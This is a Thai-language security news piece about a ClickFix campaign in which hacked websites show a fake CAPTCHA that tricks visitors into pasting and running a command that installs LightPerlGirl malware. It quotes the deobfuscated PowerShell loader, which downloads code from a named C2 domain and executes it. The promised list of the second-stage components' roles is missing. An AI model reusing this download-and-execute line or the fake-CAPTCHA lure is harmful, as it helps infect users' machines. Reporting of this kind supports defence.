การหลอกล่อให้เหยื่อทำการติดตั้งมัลแวร์ลงเครื่องนั้น เรียกได้ว่ามีหลากหลายวิธี โดยวิธีหนึ่งที่กำลังมาแรงในปัจจุบันคือ การใช้คำสั่งบนหน้าจอเพจปลอมหลอกให้เยอะต้องทำตามขั้นตอนเพื่อแก้ปัญหาที่เกิดขึ้น แท้จริงแล้วเป็นการติดตั้งมัลแวร์ โดยวิธีการดังกล่าวนั้นเรียกว่า ClickFix และข่าวนี้ก็เป็นอีกหนึ่งข่าวที่มีการแพร่กระจายมัลแวร์ด้วยวิธีการดังกล่าว
จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญ ClickFix ตัวใหม่ เพื่อใช้ในการแพร่กระจายมัลแวร์ที่มีชื่อว่า LightPerlGirl โดยแคมเปญนี้จะเป็นการที่เหยื่อเข้าสู่เว็บไซต์ปกติทั่วไปที่ถูกแฮกเกอร์ทำการเข้ายึดครองปรับเปลี่ยนสคริปท์ภายในด้วยการสอดแทรกโค้ดในรูปแบบ JavaScript ที่หลังจากที่สคริปท์ทำงานแล้ว จะเป็นการแสดง Captcha ปลอมซึ่งมีการสั่งให้เหยื่อทำตามที่ตัว Captcha สั่งให้ทำโดยอ้างว่าเป็นการทำเพื่อยืนยันตัวตนผู้ใช้งาน โดยตัว Captcha นั้นจะสั่งให้เหยื่อทำการกดปุ่มโลโก้ Windows และปุ่ม R เพื่อเปิดฟีเจอร์รันขึ้นมา ซึ่งในระหว่างนี้ตัวสคริปท์จะทำการคัดลอกโค้ดสำหรับการรันและดาวน์โหลดมัลแวร์ไว้เป็นที่เรียบร้อยแล้ว ดังนั้น สคริปท์ในขั้นถัดไปจะเป็นการสั่งให้เหยื่อทำการกดปุ่ม CTRL+V เพื่อวางตัวโค้ดลงบน Run และกด Enter เพื่อให้ตัวระบบนำไปสู่การดาวน์โหลด และรันติดตั้งมัลแวร์ดังกล่าวลงสู่เครื่อง
ภาพจาก: https://cybersecuritynews.com/beware-of-fake-captcha-that-installs-lightperlgirl-malware/
สำหรับตัวมัลแวร์ LightPerlGirl นั้นเป็นมัลแวร์ที่มาในรูปแบบของการติดตั้งแบบหลากขั้นหลายขั้นตอน (Multi-Stage Infection) โดยตัวชุดคำสั่ง PowerShell ตัวแรกที่ถูกรันขึ้นในขั้นตอน ClickFix นั้น จะเต็มไปด้วยโค้ดสำหรับการตีรวนระบบเพื่อให้ระบบป้องกันไม่สามารถจับได้ (Obfuscation) ซึ่งเมื่อมีการทำความสะอาดตัวโค้ดระหว่างการวิเคราะห์โดยทีมวิจัยออกไป ก็ได้พบว่าโค้ดดังกล่าวนั้นมีไว้เพื่อการติดต่อสื่อสารกับตัวเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ซึ่งถูกตั้งอยู่ที่ URL (cmbkz8kz1000108k2carjewzf[.]info) โดยตัวโค้ดนั้นจะมีลักษณะดังนี้
$rbld30 = 'cmbkz8kz1000108k2carjewzf.info';
$vnrl01 = Invoke-RestMethod -Uri $rbld30;
Invoke-Expression $vnrl01
หลังจากที่ตัวมัลแวร์ทำการติดต่อกับเซิร์ฟเวอร์เป็นที่เรียบร้อยแล้ว ก็จะทำการดาวน์โหลด JavaScript ตัวที่สองลงมารันบนเครื่อง โดยตัวสคริปท์นั้นจะมีองค์กรประกอบสำคัญ 3 อย่างคือ HelpIO, Urex, และ ExWpL ซึ่งแต่ละตัวนั้นจะทำหน้าที่ต่างกันดังนี้
ทั้งนี้ ทางแหล่งข่าวไม่ได้ให้ข้อมูลไว้ว่า ตัวมัลแวร์ดังกล่าวนี้เป็นมัลแวร์ประเภทใด และจะส่งผลต่อเครื่องที่ถูกฝังลงอย่างไร
|